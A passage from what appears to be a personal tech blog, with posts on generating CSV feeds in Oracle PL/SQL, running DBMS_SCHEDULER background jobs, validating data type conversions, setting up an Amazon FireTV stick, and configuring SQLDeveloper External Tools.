If for some reason that won’t work for you, it looks like you’re going to have to hack out some custom PL/SQL to get the job done…or you could have a look at a couple of the options available in what other technologies would refer to as “the ecosystem”.
What I’m going to cover is :

  • The pain of hand-cranking delimited SQL
  • A solution offered in Morten Braten’s Alexandria PL/SQL Utility Library
  • An alternative solution made available by William Robertson
  • The final PL/SQL procedure
  • Hand-cranking delimited code

    We’re working in a Data Warehouse running on Oracle. We need to provide a data feed to a downstream system.
    The feed is comma separated with values enclosed by quotes.
    The query to generate the data for the feed is reasonably straight forward :

    select dept.department_id, dept.department_name,
        loc.city, coun.country_id
    from departments dept
    inner join locations loc
        on dept.location_id = loc.location_id
    inner join countries coun
        on loc.country_id = coun.country_id  
    inner join regions reg
        on reg.region_id = coun.region_id
    where reg.region_name = 'Americas';  -- this will be passed as a parameter in the run.  
    

    All ok so far. However, when it comes to tweaking the query to generate the output, things get a bit more fiddly.
    The query in the package will have to change to something like this :

    select '"'||dept.department_id||'",'
        ||'"'||dept.department_name||'",'
        ||'"'||loc.city||'",'
        ||'"'||coun.country_id||'"'
    from departments dept
    inner join locations loc
        on dept.location_id = loc.location_id
    inner join countries coun
        on loc.country_id = coun.country_id  
    inner join regions reg
        on reg.region_id = coun.region_id
    where reg.region_name = 'Americas';    
    

    Typically, these sorts of files are generated with dozens (sometimes hundreds) of attributes. If looking at all of those quotes and commas is going to give you a headache, you might seek to mitigate the worst effects by replacing the characters with their ASCII values :

    select chr(34)||dept.department_id||chr(34)||chr(44)
        ||chr(34)||dept.department_name||chr(34)||chr(44)
        ||chr(34)||loc.city||chr(34)||chr(44)
        ||chr(34)||coun.country_id||chr(34)
    from departments dept
    inner join locations loc
        on dept.location_id = loc.location_id
    inner join countries coun
        on loc.country_id = coun.country_id  
    inner join regions reg
        on reg.region_id = coun.region_id
    where reg.region_name = 'Americas';    
    

    The double-quotes surrounding the data values are designed to escape any commas in the data and prevent them from being read as field terminators. Unfortunately, this doesn’t help much if the data also contains double-quotes. For this reason, I tend to prefer a pipe character as a delimiter. This allows us to dispense with the double-quotes. As a double-pipe is the SQL concatenation operator, let’s use the ASCII value instead for the delimiter itself :

    select dept.department_id||chr(124)
        ||dept.department_name||chr(124)
        ||loc.city||chr(124)
        ||coun.country_id
    from departments dept
    inner join locations loc
        on dept.location_id = loc.location_id
    inner join countries coun
        on loc.country_id = coun.country_id  
    inner join regions reg
        on reg.region_id = coun.region_id
    where reg.region_name = 'Americas';      
    

    Wouldn’t it be nice if there was some way we could just persuade Oracle to magically write our delimiters for us.
    Well, I don’t know about Oracle, but Morten Braten will have a go for you…

    The Alexandria CSV_UTIL_PKG package

    As with most Alexandria packages, there’s a demo on how to use CSV_UTIL_PKG in demos/csv_util_pkg_demo.sql.
    However, as explained in Morten’s post on this subject, you need to create some types first …

    create type t_str_array as table of varchar2(4000);
    /
     
    create type t_csv_line as object (
      line_number  number,
      line_raw     varchar2(4000),
      c001         varchar2(4000),
      c002         varchar2(4000),
      c003         varchar2(4000),
      c004         varchar2(4000),
      c005         varchar2(4000),
      c006         varchar2(4000),
      c007         varchar2(4000),
      c008         varchar2(4000),
      c009         varchar2(4000),
      c010         varchar2(4000),
      c011         varchar2(4000),
      c012         varchar2(4000),
      c013         varchar2(4000),
      c014         varchar2(4000),
      c015         varchar2(4000),
      c016         varchar2(4000),
      c017         varchar2(4000),
      c018         varchar2(4000),
      c019         varchar2(4000),
      c020         varchar2(4000)
    );
    /
     
    create type t_csv_tab as table of t_csv_line;
    /
    

    With these types in place, we can install the package from the Alexandria GitHub repo.
    The files we’re looking for are under the ora directory:

    • csv_util_pkg.pks
    • csv_util_pkg.pkb

    Download them and run them in the order they are listed here ( the .pks is the header and the .pkb is the body).

    Now, we can take some of the commas out of our code…

    select csv_util_pkg.array_to_csv(
        t_str_array(
            dept.department_id, dept.department_name,
            loc.city, coun.country_id))
    from departments dept
    inner join locations loc
        on dept.location_id = loc.location_id
    inner join countries coun
        on loc.country_id = coun.country_id  
    inner join regions reg
        on reg.region_id = coun.region_id
    where reg.region_name = 'Americas';
    

    By default, the results are output using a comma as the separator. However, we can change this easily enough:

     
    select csv_util_pkg.array_to_csv(
        t_str_array(dept.department_id, dept.department_name, loc.city, coun.country_id),
        chr(124))
    from departments dept
    inner join locations loc
        on dept.location_id = loc.location_id
    inner join countries coun
        on loc.country_id = coun.country_id  
    inner join regions reg
        on reg.region_id = coun.region_id
    where reg.region_name = 'Americas';
    

    The output is pretty much what we’re looking for :

    60|IT|Southlake|US
    50|Shipping|South San Francisco|US
    10|Administration|Seattle|US
    30|Purchasing|Seattle|US
    90|Executive|Seattle|US
    100|Finance|Seattle|US
    110|Accounting|Seattle|US
    120|Treasury|Seattle|US
    130|Corporate Tax|Seattle|US
    140|Control And Credit|Seattle|US
    150|Shareholder Services|Seattle|US
    160|Benefits|Seattle|US
    170|Manufacturing|Seattle|US
    180|Construction|Seattle|US
    190|Contracting|Seattle|US
    200|Operations|Seattle|US
    210|IT Support|Seattle|US
    220|NOC|Seattle|US
    230|IT Helpdesk|Seattle|US
    240|Government Sales|Seattle|US
    250|Retail Sales|Seattle|US
    260|Recruiting|Seattle|US
    270|Payroll|Seattle|US
    20|Marketing|Toronto|CA
    

    Now all you need to do is put this into your PL/SQL procedure and write some code to save it to a file ( possibly using the Alexandria FILE_UTIL_PKG package).
    If that seems like too much effort though…

    William Robertson’s CSV package

    Whilst the Alexandria package is a bit of an all-rounder, William Robertson has produced something that’s rather more tailored to producing CSV files.

    The package – simply called CSV – has a function that produces delimited format from a refcursor. It also contains a procedure to write csv data to a file.
    Let’s take a closer look…

    Installation of the package simply involves downloading the code from here, and running it. Both the package header and body are in a single file – csv.pkg.

    The package’s REPORT function takes a slightly different approach in that it takes a ref cursor as an argument :

    select column_value
    from table(csv.report(cursor(
        select dept.department_id, dept.department_name,
            loc.city, coun.country_id
        from departments dept
        inner join locations loc
            on dept.location_id = loc.location_id
        inner join countries coun
            on loc.country_id = coun.country_id  
        inner join regions reg
            on reg.region_id = coun.region_id
        where reg.region_name = 'Americas')))
    /    
    

    Once again, the delimiter character is comma by default. Once again, we can override this :

    select column_value
    from table(csv.report(cursor(
        select dept.department_id, dept.department_name,
            loc.city, coun.country_id
        from departments dept
        inner join locations loc
            on dept.location_id = loc.location_id
        inner join countries coun
            on loc.country_id = coun.country_id  
        inner join regions reg
            on reg.region_id = coun.region_id
        where reg.region_name = 'Americas'), 
        chr(124)))
    /    
    

    We can go even further. You can add common things that you may need to include in a csv that’s serving as a feed file for another system. These include :

    • a header record with a delimited list of attributes
    • a label attribute for each row of data to make these rows easier to identify for the program loading the csv
    • a rowcount as a trailer record

    All of which can be accomplished thus :

    select column_value
    from table(csv.report(cursor(
        select dept.department_id, dept.department_name,
            loc.city, coun.country_id
        from departments dept
        inner join locations loc
            on dept.location_id = loc.location_id
        inner join countries coun
            on loc.country_id = coun.country_id  
        inner join regions reg
            on reg.region_id = coun.region_id
        where reg.region_name = 'Americas'), 
        p_separator => chr(124),
        p_label => 'DATA',
        p_heading => 'Y',
        p_rowcount => 'Y'))
    /    
    
    [show output]
    

    Not only that, but the package also facilitates creating the file itself…

    Generating a file from the CSV package

    First of all, we need access to a directory. So, the DBA needs to do something like :

    grant read, write on directory app_files to hr;
    

    Now, connected as HR, we can create a PL/SQL procedure to generate our csv files like this :

    create or replace procedure depts_by_region( i_region regions.region_name%type)
    as
        l_fname varchar2(100);
        rc sys_refcursor;
    begin
        
        l_fname := i_region||'_depts.csv';
        
        open rc for
        select dept.department_id, dept.department_name,
            loc.city, coun.country_id
        from departments dept
        inner join locations loc
            on dept.location_id = loc.location_id
        inner join countries coun
            on loc.country_id = coun.country_id  
        inner join regions reg
            on reg.region_id = coun.region_id
        where reg.region_name = i_region; 
        
        csv.write_file(
            p_dataset => rc,
            p_separator => chr(124),
            p_label => 'DATA',
            p_heading => 'Y',
            p_rowcount => 'Y',
            p_directory => 'APP_FILES',
            p_filename => l_fname);
    end;
    /
    

    …and run it like this :

    begin
        depts_by_region('Americas');
    end;
    /
    

    Sure enough, when we look on the server, we can see :

    [mike@frea ~]$ cd /opt/oracle/app_files/
    [mike@frea app_files]$ ls -l *.csv
    -rw-r--r-- 1 oracle oinstall 840 Feb 11 20:56 Americas_depts.csv
    

    …and the file looks like this :

    HEADING|DATA|DEPARTMENT_ID|DEPARTMENT_NAME|CITY|COUNTRY_ID
    DATA|60|IT|Southlake|US
    DATA|50|Shipping|South San Francisco|US
    DATA|10|Administration|Seattle|US
    DATA|30|Purchasing|Seattle|US
    DATA|90|Executive|Seattle|US
    DATA|100|Finance|Seattle|US
    DATA|110|Accounting|Seattle|US
    DATA|120|Treasury|Seattle|US
    DATA|130|Corporate Tax|Seattle|US
    DATA|140|Control And Credit|Seattle|US
    DATA|150|Shareholder Services|Seattle|US
    DATA|160|Benefits|Seattle|US
    DATA|170|Manufacturing|Seattle|US
    DATA|180|Construction|Seattle|US
    DATA|190|Contracting|Seattle|US
    DATA|200|Operations|Seattle|US
    DATA|210|IT Support|Seattle|US
    DATA|220|NOC|Seattle|US
    DATA|230|IT Helpdesk|Seattle|US
    DATA|240|Government Sales|Seattle|US
    DATA|250|Retail Sales|Seattle|US
    DATA|260|Recruiting|Seattle|US
    DATA|270|Payroll|Seattle|US
    DATA|20|Marketing|Toronto|CA
    ROW_COUNT|DATA|24
    

    There are some limitations. For example, William points out that any row that’s longer than 4000 characters will cause the package to break. However, unless you’re generating fairly “wide” lines, he’s pretty much written your code for you.

    Running a “background” job in PL/SQL

    Mon, 2020-01-20 14:11

    Teddy has observed the recent General Election campaign with some interest and has concluded that he has what it takes to be the next Prime Minister.

    It’s not just the haircut, which does now look extremely Prime Ministerial…

    Politics is a robust business but Teddy’s more than capable of playing “ruff” :

    He firmly believes in the need to streamline Government at Cabinet level, which has the incumbent Chief Mouser to the Cabinet Office a little nervous.
    He’s also well used to being followed around by a “pooper scooper”. And not to put too fine a point on it, there’s more than one reason that he’s known as a “shaggy” dog.

    If he’s going to make it in politics, Teddy knows that he doesn’t have time to waste waiting for that pesky long-running job he’s just started. Oh no, he needs to use his evenings to get on with building his power base.
    Fortunately, Oracle facilitates detached execution of PL/SQL blocks by means of the DBMS_SCHEDULER package. Now, I know what you’re thinking, that’s going to involve a lot of fiddly setup with schedules and windows and chains and stuff. Well, you may be pleasantly surprised…

    The package

    Teddy has a packaged procedure that he needs to test :

    create or replace package long_runner as
        procedure write_log( 
            i_msg_type in logs.message_type%type,
            i_msg logs.message%type);
            
        procedure marathon( i_sleep in pls_integer, i_string in varchar2);
    end long_runner;
    /
        
    create or replace package body long_runner as
        procedure write_log( 
            i_msg_type in logs.message_type%type,
            i_msg logs.message%type)
        is
        pragma autonomous_transaction;
        begin
            insert into logs( message_type, message)
            values( i_msg_type, i_msg);
            
            commit;
        end write_log;    
            
        procedure marathon( i_sleep in pls_integer, i_string in varchar2)
        is
            l_msg logs.message%type;
        begin
            write_log('INFO', 'i_sleep : '||i_sleep);
            write_log('INFO', 'i_string : '||i_string);
            for i in 1..26 loop
                l_msg := null;
                for j in 1..i loop
                    l_msg := l_msg||'z';
                end loop;
                write_log('INFO', initcap( l_msg));
                dbms_session.sleep( i_sleep);
            end loop;
            write_log('INFO', 'Completed');
        end marathon;    
    end long_runner;
    /
    

    Normally, he’d kick it off in a simple PL/SQL block :

    begin
        long_runner.marathon( 30, 'Teddy for PM!');
    end;
    /
    

    Unfortunately, it’s almost time to leave for the day and he doesn’t trust Windows not to do an update and reboot itself.

    Fortunately, Teddy’s not above a (quick and) dirty trick…

    declare
        stmnt_block varchar2(4000);
    begin
        stmnt_block := q'[
            begin
                long_runner.marathon( 30, 'Teddy for PM!');
            end;
            ]';
            
        dbms_scheduler.create_job(
            job_name => 'checkit_tomorrow',
            job_type => 'PLSQL_BLOCK',
            job_action => stmnt_block,
            start_date => sysdate, -- run now
            enabled => true,
            auto_drop => true,
            comments => 'My background job - because I have a life');
    end;
    /
    

    He’s created a DBMS_SCHEDULER job on-the-fly. The job is set to run immediately by setting the start_date to now. The job will be dropped once it’s completed ( auto_drop set to true).

    Run this and it returns almost immediately. That’s because the job has been submitted rather than the PL/SQL block having finished.
    If we want to check progress, we can take a look at the scheduler views…

    Tracking job progress

    When the job starts, we can see it in USER_SCHEDULER_JOBS :

    select to_char(start_date, 'DD-MON-YYYY HH24:MI') as start_date, 
        state
    from user_scheduler_jobs
    where job_name = 'CHECKIT_TOMORROW'
    /
    
    START_DATE                 STATE               
    -------------------------- --------------------
    20-JAN-2020 19:45          RUNNING             
    

    If, for any reason, Teddy needs to terminate the job, he can simply run :

    exec dbms_scheduler.stop_job('CHECKIT_TOMORROW', true);
    

    As noted previously, the job will drop itself on completion at which point it will disappear from these views.

    To see the outcome of the job :

    select log_id, log_date, status
    from user_scheduler_job_log
    where job_name = 'CHECKIT_TOMORROW';
    
        LOG_ID LOG_DATE                         STATUS                        
    ---------- -------------------------------- ------------------------------
         53216 20-JAN-20 19.50.01.854589000 GMT SUCCEEDED                                          
    

    Sometimes we need further details. For example, if the job failed, the error stack will be included in the
    ERRORS column of the USER_SCHEDULER_JOB_RUN_DETAILS views :

    select run_duration, status,
        error#, additional_info, errors
    from user_scheduler_job_run_details
    where job_name = 'CHECKIT_TOMORROW'
    and log_id = 53216 --log id from user_scheduler_job_log;
    
    RUN_DURATION        STATUS                             ERROR# ADDITIONAL_INFO      ERRORS              
    ------------------- ------------------------------ ---------- -------------------- --------------------
    +00 00:05:00.000000 SUCCEEDED                               0                                     
    

    In this case however, it looks like Teddy’s run was perfect…just like it will be in 2024.

    Upcycling and old TV to a Smart TV with an Amazon FireTV Stick

    Mon, 2020-01-13 15:53

    Once upon a time, a TV was simply something you plugged into an arial socket and used to watch whatever broadcasters were prepared to show at any given time.
    With the rise of streaming, TVs have now become “smart”. Well, smartish. I mean, some of them use really slick software and have lots of Apps that enable you to stream from a variety of sources.
    Others are a bit less sophisticated and have limited access to such Apps.
    Not only that, the world is now full of the old type of “dumb” but perfectly serviceable TVs.
    So, if you want to :

    • Revitalise an old non-smart TV
    • Make a new not-so-smart TV smarter
    • Place a TV somewhere that’s not within easy reach of an arial socket

    …then help may be at hand. There are a number of devices you can plug into a TV to beef up it’s smartness.
    As these devices are streaming content over the internet, you don’t need an arial to make use of them.
    Furthermore, they are a fraction of the cost of buying a new Smart TV.

    What follows is an account of how I’ve setup an Amazon Fire TV Stick and used it to access the wealth of streaming content that’s freely available in the UK, as well as some of the main subscription services…

    Why FireTV ?

    Let’s be clear here, I’ve not done any extensive research into streaming sticks so I’m not saying that FireTV is the best. However, it does fulfill all of our requirements whilst being a very cheap way of “smartening up” your TV. It also happens to be the only one I’ve used, although I have used it on several TVs now, with uniformly impressive results.

    Installation pre-requisites

    First up you’re going to need a TV with an HDMI port.
    You’ll also need access to a reasonable broadband connection. At the start of 2020, let’s say that anything over 12Mb/Sec should be good enough if your not sharing, maybe super fast broadband speeds (20MB up) if you are.
    You can use slower speeds but this can be prone to buffering.

    Oh yes, you’ll also need one of these :

    firetv

    Other stuff it would be useful to have to hand :

    • Your Wifi network name and password
    • Your Amazon account – if you have one – don’t worry if you haven’t
    • Your BBC Account – if you have one

    One point to note is that, if you do happen to have an Amazon Prime account, there’s a whole bunch of streaming content that is available to you for free so it makes sense to use this account when seting up the FireTV.
    If you don’t it’s not a problem however, as we’ll see shortly…

    Initial Setup

    Plug the FireTV stick into a it’s power cable then into a mains socket. Then connect it to an HDMI port on your TV.

    Now turn on the TV and play hunt-the-HDMI-port to find out which one your FireTV is plugged into.

    FireTV will now take you through the initial setup process which consists of :

    1. Set Language (English UK in my case)
    2. Set up Wifi to connect to your network
    3. Sign in with your Amazon Account ( or create a new one) – NOTE – you can set up an account without providing any payment details !
    4. Select the brand of TV you are using so that the power and volume buttons on the FireTV remote will work

    At this point the setup will give you the opportunity to install some of the more popular apps. Don’t worry if you can’t find what you’re looking for, because we’ll add a lot more apps shortly.
    So, select Netflix, YouTube and anything else being offerred that takes your fancy.

    Finally, we have the FireTV Home screen. Before we do anything else however, we need to go to the menu that’s displayed at the top of the screen and select Settings
    Scroll across and select My Fire TV.
    Then select About from the list that pops up.
    Finally you need to select the option Install Update if it’s there.

    If there is a pending update, FireTV will download it and then either automatically re-start or prompt you to re-start it.

    Once it’s re-booted, you can now download your apps.
    Back on the Home screen menu, navigate to Apps. This opens up the FireTV app store.
    If you navigate to Categories then Entertainment, you’ll find the TV services you need to access a significant chunk of the Freeview channels, along with some subscription services.

    Some of these apps will require registration ( or use of an existing account), however all of the ones listed below can be installed and used without having to pay anything.
    Note that, as a TV License payer, you will have access to a veritable treasure trove of content on BBC iPlayer, including classic programs, box sets and even movies.

    Streaming Freeview Channels

    The mapping between Freeview Channels and Apps is as follows :

    Channel App Notes BBC 1 iPlayer BBC 2 iPlayer ITV 1 ITV Hub Channel 4 All 4 Catchup only Channel 5 My 5 Catchup only ITV 2 ITV Hub BBC 4 iPlayer ITV 3 ITV Hub Quest TV Player E 4 All 4 Catchup only Really TV Player More 4 All 4 Catchup only Dave UK TV Play Catchup only Drama UK TV Play Catchup only 5 USA My 5 Catchup only ITV 4 ITV Hub Yesterday UK TV Play Catchup only ITVBe ITV Hub 5 Star My 5 Catchup only DMax TV Player Food Network TV Player Home TV Player 47 TV Player Paramount Network My 5 Catchup only 5 Select My 5 Catchup only Blaze My 5 Catchup only PBS America My 5 Catchup only CBBC iPlayer CBeebies iPlayer CITV ITV Hub BBC News iPlayer BBC Parliament iPlayer Sky News Sky News

    You can stream some channels in more than one App. For example BBC1 can be streamed live on TVPlayer or iPlayer.

    Other useful apps

    If you’re a BT TV subscriber, you can use the BT App to access some of the content and save yourself buying an extra set-top box. Note that BT do charge for access via the FireTV stick.
    Also, if you happen to have a Plex media server configured, we’ll there’s an App for that ( under the Apps and Games category).

    In fact, if you can’t find an app, it’s always worth asking Alexa.
    Right, back to my catch-up of a repeat of QI on Dave…

    Putting VALIDATE_CONVERSION front and centre, or possibly center

    Thu, 2019-12-19 13:35

    I recently had an interesting conversation with Suzanne, a native of Pittsburgh PA, about how the Americans and British spell some words differently.
    Adding some local colour ( color) to the discussion, Suzanne recounted the story of when the US Postal service, seeking to save money on printing, proposed removing “superfluous” characters from place names.
    Well, the burghers of Pittsburgh weren’t having any of that thank-you-very-much and so the City’s name remains unabridged to this day. The denizens of Harrisburg weren’t so fortunate.
    Whilst we may be separated by a common language, as programmers who work with Oracle, Suzanne and I do share the challenge of loading data into tables when the format of that data may not be entirely what we were expecting.
    If you’re fortunate enough to inhabit the sunlit uplands of Oracle 12c R2 and beyond, we’re about to explore the shiny new VALIDATE_CONVERSION function which promises to make your life that little bit easier.
    For those languishing on 11g, we’ll explore how we might implement a similar function in PL/SQL.

    The Data to be converted

    Let’s pretend we’ve loaded some data from a file. By definition the actual data as it exists in the file is a collection of character strings. We’ve taken a permissive approach to the load (i.e. load everything if at all possible). The target table for our load is :

    create table historic_events_stg(
        id varchar2(4000),
        event_desc varchar2(4000),
        event_ts varchar2(4000))
    /    
    

    A DML representation of the data load would look like this :

    insert into historic_events_stg(id, event_desc, event_ts)
        select 'ONE', q'[Webster's Dictionary first published]', 'April 14 1828' from dual union all
        select '2', q'[Wright Brother's first flight]', 'DEC-17-1903' from dual union all
        select '3', 'NHS established in the UK', '5 July 1948' from dual union all
        select '4', 'First Manned Moon Landing',  'July 20 1969 20:17:40' from dual union all
        select '5', 'Tim Berners-Lee proposes the World Wide Web',  '19901112' from dual union all
        select '6', q'[JK Rowling's first Harry Potter book published]', '30-JUN-1997' from dual union all
        select '7', 'iPhone released in the USA', '06/29/2007' from dual;
    commit;    
    

    Now, we’d like to load the data from the staging table into our application table which looks like this :

    create table historic_events (
        id number,
        event_desc varchar2(4000),
        event_ts timestamp with time zone)
    /    
    

    In 11g and previously this might prove a bit tricky without the use of something like Log Errors :

    insert into historic_events select * from historic_events_stg;
    
    ERROR at line 1:
    ORA-01722: invalid number
    
    

    Sometimes, it would be nice if we could just see which values are going to cause problems before we even attempt to load the data…

    The VALIDATE_CONVERSION function

    Let’s see what might be causing our error…

    select id, 
        validate_conversion(id as number) as isnum
    from historic_events_stg;
    

    Yes, it’s that simple, just ask validate_conversion what happens when you try to convert all of the IDs in the table to numbers :

    ID  ISNUM
    --- -----
    ONE     0
    2       1
    3       1
    4       1
    5       1
    6       1
    7       1
    

    If the conversion is going to succeed, the function returns a 1. Otherwise, it returns a zero.
    It works for DATES too, although some extra effort may be needed.

    In my current session, the NLS_DATE_FORMAT is :

    select sys_context('userenv', 'nls_date_format') from dual;
    
    SYS_CONTEXT('USERENV','NLS_DATE_FORMAT')
    ----------------------------------------
    DD-MON-YYYY
    

    So, when I check my date strings in the staging table, most of them fail to pass muster…

    select event_ts, 
        validate_conversion(event_ts as date) as isdate
    from historic_events_stg; 
    
    EVENT_TS                  ISDATE
    ------------------------- ------
    April 14 1828                  0
    DEC-17-1903                    0
    5 July 1948                    1
    July 20 1969 20:17:40 UTC      0
    19901112                       0
    30-JUN-1997                    1
    06/29/2007                     0
    

    We can specify the date format we’re validating to so we get a slightly different result with :

    select event_ts, 
        validate_conversion(event_ts as date, 'MON-DD-YYYY') as isdate
    from historic_events_stg;
    
    EVENT_TS                       ISDAT
    ------------------------------ -----
    April 14 1828                      1
    DEC-17-1903                        1
    5th July 1948                      0
    July 20th 1969 20:17:40 UTC        0
    19901112                           0
    30-JUN-1997                        0
    06/29/2007                         0
    

    Unfortunately, it looks like we’re going to have to go through the record set and re-format most of the dates.
    OK, it’s more likely that you’d go back to whoever is giving you the feed and ask them to just pick one date format.

    The other possibility is to use the function to select the correct format to use for each conversion…

    select event_ts,
        case 
            when validate_conversion( event_ts as date, 'MON-DD-YYYY') = 1 
                then to_date(event_ts, 'MON-DD-YYYY')
            when validate_conversion( event_ts as date, 'DD Month YYYY') = 1 
                then to_date( event_ts, 'DD Month YYYY')
            when validate_conversion( event_ts as date, 'DD-MON-YYYY') = 1 
                then to_date( event_ts, 'DD-MON-YYYY')
            when validate_conversion( event_ts as date, 'MM/DD/YYYY') = 1 
                then to_date(event_ts, 'MM/DD/YYYY')
            when validate_conversion( event_ts as date, 'YYYYMMDD') = 1 
                then to_date(event_ts, 'YYYYMMDD')
            when validate_conversion(event_ts as timestamp with time zone, 'MON DD YYYY HH24:MI:SS TZR') = 1 
                then to_timestamp_tz(event_ts, 'MON DD YYYY HH24:MI:SS TZR')
        end as converted_event_ts
    from historic_events_stg; 
    
    EVENT_TS                       CONVERTED_EVENT_TS                                
    ------------------------------ --------------------------------------------------
    April 14 1828                  14-APR-28 00.01.00.000000000 EUROPE/LONDON        
    DEC-17-1903                    17-DEC-03 00.00.00.000000000 EUROPE/LONDON        
    5 July 1948                    05-JUL-48 00.00.00.000000000 EUROPE/LONDON        
    July 20 1969 20:17:40 UTC      20-JUL-69 20.17.40.000000000 UTC                  
    19901112                       12-NOV-90 00.00.00.000000000 EUROPE/LONDON        
    30-JUN-1997                    30-JUN-97 00.00.00.000000000 EUROPE/LONDON        
    06/29/2007                     29-JUN-07 00.00.00.000000000 EUROPE/LONDON        
    
    7 rows selected. 
    

    To be honest, I think I’d prefer the first option if I had a choice.
    If you’re not on 12c yet, all of this is somewhat academic. If you want to take advantage of similar functionality, you’re going to have to roll-your-own…

    The sort-of Validate Conversion function

    Using the documentation for the VALIDATE_CONVERSION function as a rough guide, we can come up with something reasonably serviceable in PL/SQL :

    create or replace function is_valid_conversion(
        i_expr in varchar2,
        i_target_type in varchar2,
        i_format in varchar2 default null)
        return pls_integer deterministic
    is
    
    --
    -- Mimic the VALIDATE_CONVERSION function that's available in 12c and above.
    -- NOTE - setting of NLS params specifically excluded here.
    -- This function simply works against the base data types i.e. :
    -- NUMBER
    -- DATE
    -- TIMESTAMP
    -- TIMESTAMP WITH TIME ZONE
    -- This should cover most of the common use-cases for this function.
    
        dummy_date date;
        dummy_num number;
        dummy_ts timestamp;
        dummy_tstz timestamp with time zone;
        
        l_type varchar2(30);
        l_format varchar2(50);
        
        e_missing_type exception;
        e_unsupported_type exception;
    begin
        -- Sanity check the input parameters
        if i_target_type is null then
            raise e_missing_type;
        elsif upper( i_target_type) not in ('NUMBER', 'DATE', 'TIMESTAMP', 'TIMESTAMP WITH TIME ZONE')
        then
            raise e_unsupported_type;
        end if;
        
        if i_expr is null then
            -- will convert to any of the data types we're dealing with here
            return 1;
        end if;
        l_type := upper( i_target_type);
        -- Now test the conversion
        if l_type = 'NUMBER' then
            if i_format is not null then
                dummy_num := to_number( i_expr, i_format);
            else
                dummy_num := to_number(i_expr);
            end if;
        elsif l_type = 'DATE' then
            l_format := coalesce( i_format, sys_context('userenv', 'nls_date_format'));
            dummy_date := to_date( i_expr, l_format);
        elsif l_type = 'TIMESTAMP' then
            l_format := coalesce( i_format, sys_context('userenv', 'nls_timestamp_format'));
            dummy_ts := to_timestamp( i_expr, l_format);
        elsif l_type = 'TIMESTAMP WITH TIME ZONE' then
            select coalesce( i_format, value)
            into l_format
            from v$nls_parameters
            where parameter = 'NLS_TIMESTAMP_TZ_FORMAT';
            
            dummy_tstz := to_timestamp_tz( i_expr, i_format);
        end if;
        
        return 1;
    exception 
        when e_missing_type then 
            raise_application_error(-20000, 'A type to convert to must be specified');
        when e_unsupported_type then
            raise_application_error(-20001, q'[Target type is not supported by this function. You haven't written that bit yet !]');
        when others then
            -- conversion has failed
            return 0;
    end is_valid_conversion;
    /
    

    Sure enough, when you run this, the results are the same :

    select id, 
        is_valid_conversion( id, 'NUMBER')
    from historic_events_stg;
    
    ID  ISNUM
    --- -----
    ONE     0
    2       1
    3       1
    4       1
    5       1
    6       1
    7       1
    
    select event_ts, 
        is_valid_conversion(event_ts, 'DATE') as isdate
    from historic_events_stg; 
    
    EVENT_TS                  ISDATE
    ------------------------- ------
    April 14 1828                  0
    DEC-17-1903                    0
    5 July 1948                    1
    July 20 1969 20:17:40 UTC      0
    19901112                       0
    30-JUN-1997                    1
    06/29/2007                     0
    
    select event_ts, 
        is_valid_conversion(event_ts, 'DATE', 'MON-DD-YYYY') as isdate
    from historic_events_stg; 
    
    EVENT_TS                           ISDATE
    ------------------------------ ----------
    April 14 1828                           1
    DEC-17-1903                             1
    5 July 1948                             0
    July 20 1969 20:17:40 UTC               0
    19901112                                0
    30-JUN-1997                             0
    06/29/2007                              0
     
    
    select event_ts,
        is_valid_conversion(event_ts, 'TIMESTAMP WITH TIME ZONE')
    from historic_events_stg
    where id = '4';
    
    EVENT_TS                          IS_TSTZ
    ------------------------------ ----------
    July 20 1969 20:17:40 UTC               1
    

    Of course, this is no substitute for a built-in SQL function in terms of both functionality and performance. However, it may provide the basis of something useful if you’re not in a position to play with all those 12c goodies just yet.

    Configuring External Tools in SQLDeveloper

    Tue, 2019-11-19 14:51

    In order to distract myself from the lunacy that is the ongoing UK General Election campaign, I’ve been continuing to spend some quality time with the Swiss Army Knife of the Oracle world, SQLDeveloper.
    I know, conventional wisdom says that when you have a hammer, everything is a nail.
    On the other hand, conventional wisdom is rather less forthcoming if instead you have a multi-tool of Central European origin.
    Fortunately, SQLDeveloper pays no heed to conventional wisdom but allows you to configure callouts to other useful software utilities by means of it’s External Tools functionality.
    What we’re going to look at here is :

    • Adding a call to an external tool in SQLDeveloper
    • Using macros to control the behaviour of an External Tool
    • Configuration settings for common tools in Windows
    • Configuration settings for common tools in Ubuntu

    Setup External Tools

    In the Tools menu, select External Tools.
    If you’re on Windows, you can kick-start matters by clicking the Find Tools button.
    This will configure :

    • Notepad
    • Internet Explorer
    • Word (if available)

    This option is not available on Ubuntu, which is where I am at the moment so…

    Adding a new tool

    I’m going to start with the equivalent to Notepad on Ubuntu.
    I feel I should apologise to the noble Gedit for that last sentence.
    From the Tools menu select External Tools :

    Click New.

    Now we need to enter the location of the program we want to run. As we’re on Linux, we can find this out easily enough :

    which gedit
    /usr/bin/gedit
    

    If we have a file in focus when we call this editor we’d like Gedit to open it. We’d also like it to use the directory in which that file is located.
    We can achieve this using some of the macros available to us. In the Argument field, click Insert. Now click on File Name :

    Click OK and we can see that the field now has a value of :

    ${file.name}
    

    We’re going to use a macro for the Run Directory as well. In this case we’ll select the File Directory macro which gives us a Run Directory value of

    ${file.dir}
    

    After all that the dialog looks like this :

    Click Next

    Next we can configure how the tool is displayed in SQLDeveloper. We’ll leave the caption as is. We’ll add a tooltip though.
    Oh, and the icon is currently set to the SQLDeveloper default for External Tools.
    On Windows, SQLDeveloper is usually smart enough to derive the appropriate icon from a fully qualified path to the executable. On Ubuntu, we need to point it in the right direction.
    We also need to be a bit careful about the size of the icon file we choose otherwise SQLDeveloper will complain with something like :

    Fortunately, Ubuntu tends to put suitably sized icons for it’s applications in :

    /usr/share/icons/gnome/16x16/apps
    

    …less fortunately, the one for Gedit isn’t called gedit.png. Anyhow, what we end up with is :

    Next, we want to determine where Gedit will be available.
    As well as the main Tools menu, we’d like it to be on the context menus and the main toolbar.
    We don’t want to log output messages :

    I’m going to leave the Availability settings at the default :

    Finally click Finish, then close the External Tools window.

    Now, if I have a file in focus, I can open it in Gedit :

    Macro Definitions

    In addition to External Tool configuration, these macros can be used elsewhere in SQLDeveloper to configure various preferences. For example, to set your Worksheet default path to be the same directory as the file that you have open at any point in time, you’d use

    "${file.dir}"
    

    You can get an idea of the value of certain macros when you select them in the External Tool setup dialog:

    The complete list of macros – at least – all of those available in the External Tool config dialog- is :

